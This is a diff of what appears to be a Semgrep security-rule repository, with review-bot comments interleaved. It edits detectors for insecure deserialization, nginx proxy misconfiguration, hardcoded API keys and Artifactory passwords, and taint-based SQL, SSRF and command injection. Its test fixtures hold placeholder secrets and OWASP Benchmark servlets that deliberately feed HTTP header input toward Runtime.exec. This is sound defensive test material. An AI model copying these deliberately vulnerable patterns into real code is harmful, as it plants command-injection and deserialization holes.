diff --git a/.github/workflows/semgrep-rule-lints.yaml b/.github/workflows/semgrep-rule-lints.yaml index 82cdb04e25..9114b485ac 100644 --- a/.github/workflows/semgrep-rule-lints.yaml +++ b/.github/workflows/semgrep-rule-lints.yaml @@ -34,6 +34,7 @@ jobs: --config yaml/semgrep/metadata-likelihood-incorrect-value.yaml \ --config yaml/semgrep/metadata-impact-incorrect-value.yaml \ --config yaml/semgrep/metadata-subcategory-incorrect-value.yaml \ + --config yaml/semgrep/metadata-incorrect-option.yaml \ --config yaml/semgrep/metadata-technology.yaml \ --config yaml/semgrep/metadata-category.yaml \ --config yaml/semgrep/multi-line-message.yaml \ diff --git a/csharp/lang/security/insecure-deserialization/javascript-serializer.cs b/csharp/lang/security/insecure-deserialization/javascript-serializer.cs index ca21953e10..2886804cf9 100644 --- a/csharp/lang/security/insecure-deserialization/javascript-serializer.cs +++ b/csharp/lang/security/insecure-deserialization/javascript-serializer.cs @@ -11,6 +11,11 @@ public void JavascriptSerializerDeserialization(string json) // ruleid: insecure-javascriptserializer-deserialization var serializer = new JavaScriptSerializer(new SimpleTypeResolver()); serializer.DeserializeObject(json); + + var resolver = new SimpleTypeResolver() + // ruleid: insecure-javascriptserializer-deserialization + var serializer2 = new JavaScriptSerializer(resolver); + serializer2.DeserializeObject(json); } catch (Exception e) { diff --git a/csharp/lang/security/insecure-deserialization/javascript-serializer.yaml b/csharp/lang/security/insecure-deserialization/javascript-serializer.yaml index a3230660b7..fb989a13d8 100644 --- a/csharp/lang/security/insecure-deserialization/javascript-serializer.yaml +++ b/csharp/lang/security/insecure-deserialization/javascript-serializer.yaml 
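Review bot: The added fixture line `var resolver = new SimpleTypeResolver()` in javascript-serializer.cs has no terminating semicolon, so the new case is not valid C#; Semgrep's error recovery may still parse it, but a match that depends on recovery makes this fixture a weak witness for the typed-metavariable pattern the commit introduces in javascript-serializer.yaml. Use `var resolver = new SimpleTypeResolver();`. The enclosing try block of JavascriptSerializerDeserialization starts outside the hunk.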
@@ -30,4 +30,4 @@ rules: using System.Web.Script.Serialization; ... - pattern: | - new JavaScriptSerializer(new SimpleTypeResolver()); + new JavaScriptSerializer((SimpleTypeResolver $RESOLVER)) diff --git a/generic/nginx/security/missing-internal.conf b/generic/nginx/security/missing-internal.conf index c9bd02aa5d..90122b11a0 100644 --- a/generic/nginx/security/missing-internal.conf +++ b/generic/nginx/security/missing-internal.conf @@ -19,3 +19,11 @@ server { proxy_pass $1://$2/$3; } } + +server { + location / { + # ok: missing-internal + proxy_pass http:/backend:42/; + set $false 'positive'; + } +} diff --git a/generic/nginx/security/missing-internal.yaml b/generic/nginx/security/missing-internal.yaml index aa513ea1ca..c29312d4dc 100644 --- a/generic/nginx/security/missing-internal.yaml +++ b/generic/nginx/security/missing-internal.yaml @@ -1,18 +1,24 @@ rules: - id: missing-internal + options: + generic_ellipsis_max_span: 0 + generic_engine: aliengrep patterns: - - pattern-inside: | - location ... { - ... - ... - } - - pattern-not-inside: | - location ... { - ... - internal; - ... - } - - pattern: proxy_pass ...$...; + - pattern-inside: | + location ... { + .... + .... + } + - pattern-not-inside: | + location ... { + .... + internal; + .... + } + - pattern: proxy_pass $...URL; + - metavariable-regex: + metavariable: $...URL + regex: (.*\$.*) paths: include: - '*.conf' diff --git a/generic/secrets/gitleaks/generic-api-key.txt b/generic/secrets/gitleaks/generic-api-key.txt index 3615701ba4..9c35ba7369 100644 --- a/generic/secrets/gitleaks/generic-api-key.txt +++ b/generic/secrets/gitleaks/generic-api-key.txt 
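Review bot: `new JavaScriptSerializer((SimpleTypeResolver $RESOLVER))` only matches where Semgrep can type the argument as SimpleTypeResolver, which it can for `new SimpleTypeResolver()` and for a local initialised from it, but presumably not for a resolver that arrives through a parameter or field declared as the base type JavaScriptTypeResolver or that comes out of a factory; the injected-dependency shape real code tends to use is therefore still missed. That gap should be visible rather than silent: add a `todoruleid:` case in the fixture for a base-typed parameter and a one-line comment above the pattern stating which shapes the typed metavariable covers. The `pattern-inside` that contains this pattern starts outside the hunk.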
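Review bot: `proxy_pass http:/backend:42/;` in the new `ok` server block has a single slash after the scheme; nginx only accepts `http://` or `https://` here and rejects such a configuration at load time, so the fixture documents a negative case that cannot exist in a deployed config. Use `proxy_pass http://backend:42/;` — the URL still carries no `$`, so it keeps exercising the new metavariable-regex. `set $false 'positive';` is a useful addition because it pins that a `$` elsewhere in the location body does not trigger the rule.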
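Review bot: `generic_ellipsis_max_span: 0` under `options:` looks like a spacegrep setting; with `generic_engine: aliengrep` the single-line versus multi-line distinction is already expressed by the `...` in `location ... {` and the `....` in the bodies, so the option may be inert and should either carry a comment saying what it is meant to constrain or be dropped. Separately, the `metavariable-regex` on `$...URL` with `(.*\$.*)` narrows the rule to proxy_pass targets that contain a variable, so a static upstream without `internal;` is no longer reported; that is a defensible precision trade-off, but the rule message and metadata (outside the hunk) should state that the finding is about variable-driven proxy targets.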
@@ -17,7 +17,7 @@ private const string UserCreationPasswordSecretKey =@"6da89121079f83b2eb6acccf82 // ruleid: generic-api-key app.secret=edf10572-880c-4dd9-aaf0-6ec402f678db // ruleid: generic-api-key -val PASSWORD = "Iv1.6213212547e00438__globPaths__123" +val PASSWORD = "Iv1.6213212547e00438__globaths__123" eironment: POSTGRES_DB: postgres POSTGRES_USER: as2user @@ -34,7 +34,7 @@ this.cmfPassword.foo = "thiscmfPassword1" const connectionToken = `12345-123-abc`; this._perfKey = 'network_XMLHttpRequest_' + String(friendlyName); -// todook: generic-api-key +// ok: generic-api-key this.txtCfmPassword.Name = "txtCfmPassword"; // ok: generic-api-key @@ -207,4 +207,4 @@ clientToken: "pub4306832bdc5f2b8b980c492ec2c11ef3", // ok: generic-api-key keys: 'privkey1.json', // ok: generic-api-key -"Keywords": "asdsadsadsaUSAdusadusadsa", +"Keywords": "asdsadsadsaUSAdusadusadsa", \ No newline at end of file diff --git a/generic/secrets/gitleaks/generic-api-key.yaml b/generic/secrets/gitleaks/generic-api-key.yaml index 27281761eb..823000c73a 100644 --- a/generic/secrets/gitleaks/generic-api-key.yaml +++ b/generic/secrets/gitleaks/generic-api-key.yaml 
@@ -68,4 +68,7 @@ rules: regex: (?!(^0x0*|^pub)|.*\.(bin|json|exe)$|.*(?i)(Client|Factory)$|(^__[A-Za-z]+__$)|^(12345|abcd)|^\d+(\.\d+)?$) # Remove AAAAA, BBBBB, CCCCC, and ..... - pattern-not-regex: (\w|\.)\1{5} - \ No newline at end of file + # stopwords from https://github.com/gitleaks/gitleaks/blob/d9f86d6123d9ef2558c4852a522a7a071d6a6fe9/cmd/generate/config/rules/stopwords.go#L4 + - metavariable-regex: + metavariable: $CONTENT + regex: (?!(?i).*(client|endpoint|vpn|_ec2_|aws_|authorize|author|define|config|credential|setting|sample|xxxxxx|000000|buffer|delete|aaaaaa|fewfwef|getenv|env_|system|example|ecdsa|sha256|sha1|sha2|md5|alert|wizard|target|onboard|welcome|page|exploit|experiment|expire|rabbitmq|scraper|widget|music|dns_|dns-|yahoo|want|json|action|script|fix_|fix-|develop|compas|stripe|service|master|metric|tech|gitignore|rich|open|stack|irc_|irc-|sublime|kohana|has_|has-|\.\.\.|fabric|wordpres|role|osx_|osx-|boost|addres|queue|working|sandbox|internet|print|vision|tracking|being|generator|traffic|world|pull|rust|watcher|small|auth|full|hash|more|install|auto|complete|learn|paper|installer|research|acces|last|binding|spine|into|chat|algorithm|resource|uploader|video|maker|next|proc|lock|robot|snake|patch|matrix|drill|terminal|term|stuff|genetic|generic|identity|audit|pattern|audio|web_|web-|crud|problem|statu|cms-|cms_|arch|coffee|workflow|changelog|another|uiview|content|kitchen|gnu_|gnu-|gnu.|conf|couchdb|client|opencv|rendering|update|concept|varnish|gui_|gui-|gui.|version|shared|extra|product|still|not_|not-|not.|drop|ring|png_|png-|png.|actively|import|output|backup|start|embedded|registry|pool|semantic|instagram|bash|system|ninja|drupal|jquery|polyfill|physic|league|guide|pack|synopsi|sketch|injection|svg_|svg-|svg.|friendly|wave|convert|manage|camera|link|slide|timer|wrapper|gallery|url_|url-|url.|todomvc|requirej|party|http|payment|async|library|home|coco|gaia|display|universal|func|metadata|hipchat|under|room|config|personal|realtime|resume|data
base|testing|tiny|basic|forum|meetup|yet_|yet-|yet.|cento|dead|fluentd|editor|utilitie|run_|run-|run.|box_|box-|box.|bot_|bot-|bot.|making|sample|group|monitor|ajax|parallel|cassandra|ultimate|site|get_|get-|get.|gen_|gen-|gen.|gem_|gem-|gem.|extended|image|knife|asset|nested|zero|plugin|bracket|mule|mozilla|number|act_|act-|act.|map_|map-|map.|micro|debug|openshift|chart|expres|backend|task|source|translate|jbos|composer|sqlite|profile|mustache|mqtt|yeoman|have|builder|smart|like|oauth|school|guideline|captcha|filter|bitcoin|bridge|color|toolbox|discovery|new_|new-|new.|dashboard|when|setting|level|post|standard|port|platform|yui_|yui-|yui.|grunt|animation|haskell|icon|latex|cheat|lua_|lua-|lua.|gulp|case|author|without|simulator|wifi|directory|lisp|list|flat|adventure|story|storm|gpu_|gpu-|gpu.|store|caching|attention|solr|logger|demo|shortener|hadoop|finder|phone|pipeline|range|textmate|showcase|app_|app-|app.|idiomatic|edit|our_|our-|our.|out_|out-|out.|sentiment|linked|why_|why-|why.|local|cube|gmail|job_|job-|job.|rpc_|rpc-|rpc.|contest|tcp_|tcp-|tcp.|usage|buildout|weather|transfer|automated|sphinx|issue|sas_|sas-|sas.|parallax|jasmine|addon|machine|solution|dsl_|dsl-|dsl.|episode|menu|theme|best|adapter|debugger|chrome|tutorial|life|step|people|joomla|paypal|developer|solver|team|current|love|visual|date|data|canva|container|future|xml_|xml-|xml.|twig|nagio|spatial|original|sync|archived|refinery|science|mapping|gitlab|play|ext_|ext-|ext.|session|impact|set_|set-|set.|see_|see-|see.|migration|commit|community|shopify|what'|cucumber|statamic|mysql|location|tower|line|code|amqp|hello|send|index|high|notebook|alloy|python|field|document|soap|edition|email|php_|php-|php.|command|transport|official|upload|study|secure|angularj|akka|scalable|package|request|con_|con-|con.|flexible|security|comment|module|flask|graph|flash|apache|change|window|space|lambda|sheet|bookmark|carousel|friend|objective|jekyll|bootstrap|first|article|gwt_|gwt-|gwt.|classic|media|websocket
|touch|desktop|real|read|recorder|moved|storage|validator|add-on|pusher|scs_|scs-|scs.|inline|asp_|asp-|asp.|timeline|base|encoding|ffmpeg|kindle|tinymce|pretty|jpa_|jpa-|jpa.|used|user|required|webhook|download|resque|espresso|cloud|mongo|benchmark|pure|cakephp|modx|mode|reactive|fuel|written|flickr|mail|brunch|meteor|dynamic|neo_|neo-|neo.|new_|new-|new.|net_|net-|net.|typo|type|keyboard|erlang|adobe|logging|ckeditor|message|iso_|iso-|iso.|hook|ldap|folder|reference|railscast|www_|www-|www.|tracker|azure|fork|form|digital|exporter|skin|string|template|designer|gollum|fluent|entity|language|alfred|summary|wiki|kernel|calendar|plupload|symfony|foundry|remote|talk|search|dev_|dev-|dev.|del_|del-|del.|token|idea|sencha|selector|interface|create|fun_|fun-|fun.|groovy|query|grail|red_|red-|red.|laravel|monkey|slack|supported|instant|value|center|latest|work|but_|but-|but.|bug_|bug-|bug.|virtual|tweet|statsd|studio|path|real-time|frontend|notifier|coding|tool|firmware|flow|random|mediawiki|bosh|been|beer|lightbox|theory|origin|redmine|hub_|hub-|hub.|require|pro_|pro-|pro.|ant_|ant-|ant.|any_|any-|any.|recipe|closure|mapper|event|todo|model|redi|provider|rvm_|rvm-|rvm.|program|memcached|rail|silex|foreman|activity|license|strategy|batch|streaming|fast|use_|use-|use.|usb_|usb-|usb.|impres|academy|slider|please|layer|cros|now_|now-|now.|miner|extension|own_|own-|own.|app_|app-|app.|debian|symphony|example|feature|serie|tree|project|runner|entry|leetcode|layout|webrtc|logic|login|worker|toolkit|mocha|support|back|inside|device|jenkin|contact|fake|awesome|ocaml|bit_|bit-|bit.|drive|screen|prototype|gist|binary|nosql|rest|overview|dart|dark|emac|mongoid|solarized|homepage|emulator|commander|django|yandex|gradle|xcode|writer|crm_|crm-|crm.|jade|startup|error|using|format|name|spring|parser|scratch|magic|try_|try-|try.|rack|directive|challenge|slim|counter|element|chosen|doc_|doc-|doc.|meta|should|button|packet|stream|hardware|android|infinite|password|software|ghost|xamarin|spe
c|chef|interview|hubot|mvc_|mvc-|mvc.|exercise|leaflet|launcher|air_|air-|air.|photo|board|boxen|way_|way-|way.|computing|welcome|notepad|portfolio|cat_|cat-|cat.|can_|can-|can.|magento|yaml|domain|card|yii_|yii-|yii.|checker|browser|upgrade|only|progres|aura|ruby_|ruby-|ruby.|polymer|util|lite|hackathon|rule|log_|log-|log.|opengl|stanford|skeleton|history|inspector|help|soon|selenium|lab_|lab-|lab.|scheme|schema|look|ready|leveldb|docker|game|minimal|logstash|messaging|within|heroku|mongodb|kata|suite|picker|win_|win-|win.|wip_|wip-|wip.|panel|started|starter|front-end|detector|deploy|editing|based|admin|capture|spree|page|bundle|goal|rpg_|rpg-|rpg.|setup|side|mean|reader|cookbook|mini|modern|seed|dom_|dom-|dom.|doc_|doc-|doc.|dot_|dot-|dot.|syntax|sugar|loader|website|make|kit_|kit-|kit.|protocol|human|daemon|golang|manager|countdown|connector|swagger|map_|map-|map.|mac_|mac-|mac.|man_|man-|man.|orm_|orm-|orm.|org_|org-|org.|little|zsh_|zsh-|zsh.|shop|show|workshop|money|grid|server|octopres|svn_|svn-|svn.|ember|embed|general|file|important|dropbox|portable|public|docpad|fish|sbt_|sbt-|sbt.|done|para|network|common|readme|popup|simple|purpose|mirror|single|cordova|exchange|object|design|gateway|account|lamp|intellij|math|mit_|mit-|mit.|control|enhanced|emitter|multi|add_|add-|add.|about|socket|preview|vagrant|cli_|cli-|cli.|powerful|top_|top-|top.|radio|watch|fluid|amazon|report|couchbase|automatic|detection|sprite|pyramid|portal|advanced|plu_|plu-|plu.|runtime|git_|git-|git.|uri_|uri-|uri.|haml|node|sql_|sql-|sql.|cool|core|obsolete|handler|iphone|extractor|array|copy|nlp_|nlp-|nlp.|reveal|pop_|pop-|pop.|engine|parse|check|html|nest|all_|all-|all.|chinese|buildpack|what|tag_|tag-|tag.|proxy|style|cookie|feed|restful|compiler|creating|prelude|context|java|rspec|mock|backbone|light|spotify|flex|related|shell|which|clas|webapp|swift|ansible|unity|console|tumblr|export|campfire|conway'|made|riak|hero|here|unix|unit|glas|smtp|how_|how-|how.|hot_|hot-|hot.|debug|releas
e|diff|player|easy|right|old_|old-|old.|animate|time|push|explorer|course|training|nette|router|draft|structure|note|salt|where|spark|trello|power|method|social|via_|via-|via.|vim_|vim-|vim.|select|webkit|github|ftp_|ftp-|ftp.|creator|mongoose|led_|led-|led.|movie|currently|pdf_|pdf-|pdf.|load|markdown|phalcon|input|custom|atom|oracle|phonegap|ubuntu|great|rdf_|rdf-|rdf.|popcorn|firefox|zip_|zip-|zip.|cuda|dotfile|static|openwrt|viewer|powered|graphic|les_|les-|les.|doe_|doe-|doe.|maven|word|eclipse|lab_|lab-|lab.|hacking|steam|analytic|option|abstract|archive|reality|switcher|club|write|kafka|arduino|angular|online|title|don't|contao|notice|analyzer|learning|zend|external|staging|busines|tdd_|tdd-|tdd.|scanner|building|snippet|modular|bower|stm_|stm-|stm.|lib_|lib-|lib.|alpha|mobile|clean|linux|nginx|manifest|some|raspberry|gnome|ide_|ide-|ide.|block|statistic|info|drag|youtube|koan|facebook|paperclip|art_|art-|art.|quality|tab_|tab-|tab.|need|dojo|shield|computer|stat|state|twitter|utility|converter|hosting|devise|liferay|updated|force|tip_|tip-|tip.|behavior|active|call|answer|deck|better|principle|ches|bar_|bar-|bar.|reddit|three|haxe|just|plug-in|agile|manual|tetri|super|beta|parsing|doctrine|minecraft|useful|perl|sharing|agent|switch|view|dash|channel|repo|pebble|profiler|warning|cluster|running|markup|evented|mod_|mod-|mod.|share|csv_|csv-|csv.|response|good|house|connect|built|build|find|ipython|webgl|big_|big-|big.|google|scala|sdl_|sdl-|sdl.|sdk_|sdk-|sdk.|native|day_|day-|day.|puppet|text|routing|helper|linkedin|crawler|host|guard|merchant|poker|over|writing|free|classe|component|craft|nodej|phoenix|longer|quick|lazy|memory|clone|hacker|middleman|factory|motion|multiple|tornado|hack|ssh_|ssh-|ssh.|review|vimrc|driver|driven|blog|particle|table|intro|importer|thrift|xmpp|framework|refresh|react|font|librarie|variou|formatter|analysi|karma|scroll|tut_|tut-|tut.|apple|tag_|tag-|tag.|tab_|tab-|tab.|category|ionic|cache|homebrew|reverse|english|getting|shippin
g|clojure|boot|book|branch|combination|combo)) \ No newline at end of file diff --git a/generic/secrets/security/detected-artifactory-password.txt b/generic/secrets/security/detected-artifactory-password.txt index 4130d4ee4e..d81be1bdca 100644 --- a/generic/secrets/security/detected-artifactory-password.txt +++ b/generic/secrets/security/detected-artifactory-password.txt @@ -1,11 +1,5 @@ # ruleid: detected-artifactory-password -AP6xxxxxxxxxx - -# ruleid: detected-artifactory-password -AP2xxxxxxxxxx - -# ruleid: detected-artifactory-password -artifactoryx:_password=AP6xxxxxxxxxx +artifactoryx:_password=AP6abc1231321 # ok: detected-artifactory-password integrity sha512-AP1AyUTbi2szylgr+O0OB7gkIxEGzySLITZ2GpsaoX72YMCGI2jYAc+WUhPfvUnZYiauF4zTnN4V4TGuvFjJlw== @@ -19,9 +13,6 @@ ImageID: "SHA256:AP1AyUTbi2szylgr266fcae00707e67a2545ef34f9a29354585f93dac906749 # ok: detected-artifactory-password - hasql-1.6.0.1@sha256:AP1AyUTbi2szylgr+422a3bb776a12d5cf2bb83303778f343106f9a1cc2b4fcdf73,6628 -# ruleid: detected-artifactory-password -artifactoryx_password:AP6xxxxxxxxxx - # ok: detected-artifactory-password X-JFrog-Art-Api: $PASSWORD @@ -124,7 +115,7 @@ b3IgcHJvbW90ZSBwcm9kdWN0cyBkZXJpdmVkIGZyb20KIHRoaXMgc29mdHdhcmUgd2l0aG9 -----BEGIN PGP PUBLIC KEY BLOCK----- # ok: detected-artifactory-password -AP6xxxxxxxxxx +AP6abc1231321 -----END PGP PUBLIC KEY BLOCK----- apiVersion: appprotectdos.f5.com/v1beta1 diff --git a/generic/secrets/security/detected-artifactory-password.yaml b/generic/secrets/security/detected-artifactory-password.yaml index 90ab3a9a45..b89125ac49 100644 --- a/generic/secrets/security/detected-artifactory-password.yaml +++ b/generic/secrets/security/detected-artifactory-password.yaml 
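Review bot: The stopword alternation in the new `metavariable-regex` contains many entries ending in an unescaped dot (`add.`, `app.`, `get.`, `set.`, `new.`, `not.`, `log.`, `all.`, `tag.`, `www.` and others); in the Go source these were literal substrings, but in a regex `.` matches any character, and combined with the leading `(?i).*` every candidate containing e.g. `add`, `get` or `log` followed by anything is suppressed. For high-entropy secrets that is a sizeable false-negative surface, and the fixture edit of `__globPaths__` to `__globaths__` in generic-api-key.txt is already a symptom of a plain word (`path`) suppressing a true positive. Escape them as `add\.` (the list already does this for `\.\.\.`) or drop the dot-suffixed variants, and add a `todoruleid:` fixture line for a secret that happens to contain a stopword. I cannot see whether `$CONTENT` is bound by a pattern earlier in the rule; the regex is only applied if it is.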
@@ -1,35 +1,16 @@
 rules:
 - id: detected-artifactory-password
- options:
- generic_engine: aliengrep
- generic_multiline: false
- generic_caseless: true
 patterns:
- - pattern: $ITEM
- - metavariable-regex:
- metavariable: $ITEM
- regex: \bAP[\dABCDEF][a-zA-Z0-9]{8,}
- - pattern-not-inside: |
- sha1...
- - pattern-not-inside: |
- sha2...
- - pattern-not-inside: |
- sha3...
- - pattern-not-inside: |
- sha118...
- - pattern-not-inside: |
- sha256...
- - pattern-not-inside: |
- sha512...
- - pattern-not-inside: |
- -BEGIN ...-
- ....
- ...-END ...-
+ - pattern-regex: (?\bAP[\dABCDEF][a-zA-Z0-9]{8,})
+ - pattern-regex: .*(?i)arti[-_]?factory.*
+ - pattern-not-regex: .*(?i)sha(1|2|3|118|256|512).*
+ - pattern-not-regex: (?i)-----\s*?BEGIN[ A-Z0-9_-]*? KEY( BLOCK)?-----[\s\S]*?-----\s*?END[ A-Z0-9_-]*?\s*?-----
 - metavariable-analysis:
 analyzer: entropy
 metavariable: $ITEM
+ - pattern-not-regex: (\w|\.|\*)\1{4}
 languages:
- - generic
+ - regex
 paths:
 exclude:
 - "*.svg"
diff --git a/go/gorilla/security/audit/handler-assignment-from-multiple-sources.yaml b/go/gorilla/security/audit/handler-assignment-from-multiple-sources.yaml
index 1a632f5f2e..15c908f892 100644
--- a/go/gorilla/security/audit/handler-assignment-from-multiple-sources.yaml
+++ b/go/gorilla/security/audit/handler-assignment-from-multiple-sources.yaml
@@ -1,7 +1,5 @@
 rules:
 - id: handler-assignment-from-multiple-sources
- options:
- taint_unified_mvars: true
 metadata:
 cwe:
 - 'CWE-289: Authentication Bypass by Alternate Name'
diff --git a/go/gorm/security/audit/gorm-dangerous-methods-usage.yaml b/go/gorm/security/audit/gorm-dangerous-methods-usage.yaml
index cd849e533e..2dbf73f62d 100644
--- a/go/gorm/security/audit/gorm-dangerous-methods-usage.yaml
+++ b/go/gorm/security/audit/gorm-dangerous-methods-usage.yaml
@@ -45,6 +45,8 @@ rules:
 - pattern: strconv.Atoi(...)
 - pattern: |
 ($X: bool)
+ options:
+ interfile: true
 metadata:
 category: security
 technology:
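Review bot: `- pattern-regex: (?\bAP[\dABCDEF][a-zA-Z0-9]{8,})` is not valid PCRE as shown (`(?` must be followed by a group modifier), and the kept `metavariable-analysis` block needs `$ITEM` bound by a named capture now that the rule runs as `languages: [regex]`; if the page merely lost an angle-bracket pair in rendering, ignore this, otherwise the line should read `- pattern-regex: (?P<ITEM>\bAP[\dABCDEF][a-zA-Z0-9]{8,})`. Note also that the second `pattern-regex` (`.*(?i)arti[-_]?factory.*`) requires the token and the word artifactory on the same line, since `.*` does not cross newlines; the fixture drops the bare-token cases accordingly, but JFrog's own header form (`X-JFrog-Art-Api:`, present in the fixture only with a `$PASSWORD` placeholder) would also not match, so consider `arti[-_]?factory|jfrog` in that alternation plus a `ruleid` line for it.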
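Review bot: Dropping `taint_unified_mvars: true` changes how a metavariable that appears in both a source and a sink of this taint rule is bound — without unification the same name may refer to different values on each side — so the rule can now report handlers assembled from unrelated sources; the sources and sinks are outside the hunk, so I cannot confirm whether they share a metavariable. If the option was removed because the engine no longer honours it, a one-line comment on the rule saying so, and a run of the existing `ruleid`/`ok` fixtures, would keep the intent discoverable.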
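Review bot: `options: interfile: true` is appended here and, with the same two lines, in the go/jwt-go, md5-used-as-password, filepath-clean-misuse, go tainted-sql-string, go tainted-url-host, both java/aws-lambda, tainted-session-from-http-request, no-direct-response-writer, spring tainted-file-path, spring tainted-url-host, javascript open-redirect and the seven express rule hunks; only spring tainted-sql-string merges it into an existing `options:` block. A rule file that already declares `options:` elsewhere (not visible in most of these hunks) would end up with a duplicate mapping key, which YAML loaders either reject or silently resolve last-wins, so each file should be checked for a pre-existing block and the key merged as done for spring tainted-sql-string. For the javascript rules the context lines show `metadata: interfile: true` already present; presumably `options.interfile` is the engine switch while `metadata.interfile` is the registry marker, which deserves a one-line comment now that the two must be kept in sync.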
diff --git a/go/jwt-go/security/jwt.yaml b/go/jwt-go/security/jwt.yaml index b5c25229d0..261316b788 100644 --- a/go/jwt-go/security/jwt.yaml +++ b/go/jwt-go/security/jwt.yaml @@ -6,6 +6,8 @@ rules: being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module). + options: + interfile: true metadata: cwe: - 'CWE-798: Use of Hard-coded Credentials' diff --git a/go/lang/security/audit/md5-used-as-password.yaml b/go/lang/security/audit/md5-used-as-password.yaml index 38486b8bd7..b2d42f92a9 100644 --- a/go/lang/security/audit/md5-used-as-password.yaml +++ b/go/lang/security/audit/md5-used-as-password.yaml @@ -7,6 +7,8 @@ rules: secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as bcrypt. You can use the `golang.org/x/crypto/bcrypt` package. + options: + interfile: true metadata: category: security technology: diff --git a/go/lang/security/filepath-clean-misuse.yaml b/go/lang/security/filepath-clean-misuse.yaml index a621c75727..516b6d8505 100644 --- a/go/lang/security/filepath-clean-misuse.yaml +++ b/go/lang/security/filepath-clean-misuse.yaml @@ -31,6 +31,8 @@ rules: - pattern: | "/" + ... fix: filepath.FromSlash(filepath.Clean("/"+strings.Trim($...INNER, "/"))) + options: + interfile: true metadata: references: - https://pkg.go.dev/path#Clean diff --git a/go/lang/security/injection/tainted-sql-string.yaml b/go/lang/security/injection/tainted-sql-string.yaml index 8f533ec045..78f4a3f64c 100644 --- a/go/lang/security/injection/tainted-sql-string.yaml +++ b/go/lang/security/injection/tainted-sql-string.yaml 
@@ -9,6 +9,8 @@ rules: or manipulate data from the database. Instead, use prepared statements (`db.Query("SELECT * FROM t WHERE id = ?", id)`) or a safe library. + options: + interfile: true metadata: cwe: - "CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')" diff --git a/go/lang/security/injection/tainted-url-host.yaml b/go/lang/security/injection/tainted-url-host.yaml index cc4e1091f7..01c66edd5a 100644 --- a/go/lang/security/injection/tainted-url-host.yaml +++ b/go/lang/security/injection/tainted-url-host.yaml @@ -9,6 +9,8 @@ rules: path or query parameter. When user-input is necessary to craft the request, it is recommended to follow OWASP best practices to prevent abuse, including using an allowlist. + options: + interfile: true metadata: cwe: - "CWE-918: Server-Side Request Forgery (SSRF)" diff --git a/java/aws-lambda/security/tainted-sql-string.yaml b/java/aws-lambda/security/tainted-sql-string.yaml index 69f8d2133d..7c68ef31f8 100644 --- a/java/aws-lambda/security/tainted-sql-string.yaml +++ b/java/aws-lambda/security/tainted-sql-string.yaml @@ -9,6 +9,8 @@ rules: of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries. + options: + interfile: true metadata: references: - https://owasp.org/www-community/attacks/SQL_Injection diff --git a/java/aws-lambda/security/tainted-sqli.yaml b/java/aws-lambda/security/tainted-sqli.yaml index 40fa5263b1..eb7d253bea 100644 --- a/java/aws-lambda/security/tainted-sqli.yaml +++ b/java/aws-lambda/security/tainted-sqli.yaml @@ -47,6 +47,8 @@ rules: - metavariable-regex: metavariable: $SQLCMD regex: (execute|query|executeUpdate) + options: + interfile: true metadata: category: security technology: 
diff --git a/java/lang/security/audit/tainted-cmd-from-http-request.java b/java/lang/security/audit/tainted-cmd-from-http-request.java
index f3de1cd2c9..9cb761fcda 100644
--- a/java/lang/security/audit/tainted-cmd-from-http-request.java
+++ b/java/lang/security/audit/tainted-cmd-from-http-request.java
@@ -23,6 +23,7 @@
 import javax.servlet.http.HttpServlet;
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
+import java.lang.Runtime;
 @WebServlet(value = "/cmdi-00/BenchmarkTest00006")
 public class bad1 extends HttpServlet {
@@ -111,7 +112,8 @@ public void doPost(HttpServletRequest request, HttpServletResponse response)
 Runtime r = Runtime.getRuntime();
 try {
- // ruleid: tainted-cmd-from-http-request
+ // this is vulnerable, but considered a separate issue
+ // ok: tainted-cmd-from-http-request
 Process p = r.exec(args, argsEnv);
 org.owasp.benchmark.helpers.Utils.printOSCommandResults(p, response);
 } catch (IOException e) {
@@ -172,7 +174,8 @@ public void doPost(HttpServletRequest request, HttpServletResponse response)
 Runtime r = Runtime.getRuntime();
 try {
- // ruleid: tainted-cmd-from-http-request
+ // this is vulnerable, but considered a separate issue
+ // ok: tainted-cmd-from-http-request
 Process p = r.exec(args, argsEnv);
 org.owasp.benchmark.helpers.Utils.printOSCommandResults(p, response);
 } catch (IOException e) {
diff --git a/java/lang/security/audit/tainted-env-from-http-request.java b/java/lang/security/audit/tainted-env-from-http-request.java
new file mode 100644
index 0000000000..47200e7d6f
--- /dev/null
+++ b/java/lang/security/audit/tainted-env-from-http-request.java
@@ -0,0 +1,122 @@
+/**
+ * OWASP Benchmark v1.2
+ *
+ *
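Review bot: `import java.lang.Runtime;` is redundant in Java (java.lang is imported implicitly) and production servlets never carry it; if it was added so that the typed metavariable `(java.lang.Runtime $R)` in tainted-env-from-http-request.yaml resolves in the fixture, then the same line in the new tainted-env-from-http-request.java hunk is masking a false negative on real code, and the rule should be run once against a copy of the fixture with the import removed. The swap from `ruleid` to `ok` on the two `r.exec(args, argsEnv)` calls is consistent with the env path moving to its own rule, but the comment would serve better as a cross-reference, e.g. `// env array is tainted; covered by tainted-env-from-http-request`. The doPost bodies start outside the hunks.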

This file is part of the Open Web Application Security Project (OWASP) Benchmark Project. For + * details, please see https://owasp.org/www-project-benchmark/. + * + *

The OWASP Benchmark is free software: you can redistribute it and/or modify it under the terms + * of the GNU General Public License as published by the Free Software Foundation, version 2. + * + *

The OWASP Benchmark is distributed in the hope that it will be useful, but WITHOUT ANY + * WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR + * PURPOSE. See the GNU General Public License for more details. + * + * @author Dave Wichers + * @created 2015 + */ +package org.owasp.benchmark.testcode; + +import java.io.IOException; +import javax.servlet.ServletException; +import javax.servlet.annotation.WebServlet; +import javax.servlet.http.HttpServlet; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import java.lang.Runtime; + +@WebServlet(value = "/cmdi-00/BenchmarkTest00007") +public class bad2 extends HttpServlet { + + private static final long serialVersionUID = 1L; + + @Override + public void doGet(HttpServletRequest request, HttpServletResponse response) + throws ServletException, IOException { + doPost(request, response); + } + + @Override + public void doPost(HttpServletRequest request, HttpServletResponse response) + throws ServletException, IOException { + // some code + response.setContentType("text/html;charset=UTF-8"); + + String param = ""; + if (request.getHeader("BenchmarkTest00007") != null) { + param = request.getHeader("BenchmarkTest00007"); + } + + // URL Decode the header value since req.getHeader() doesn't. Unlike 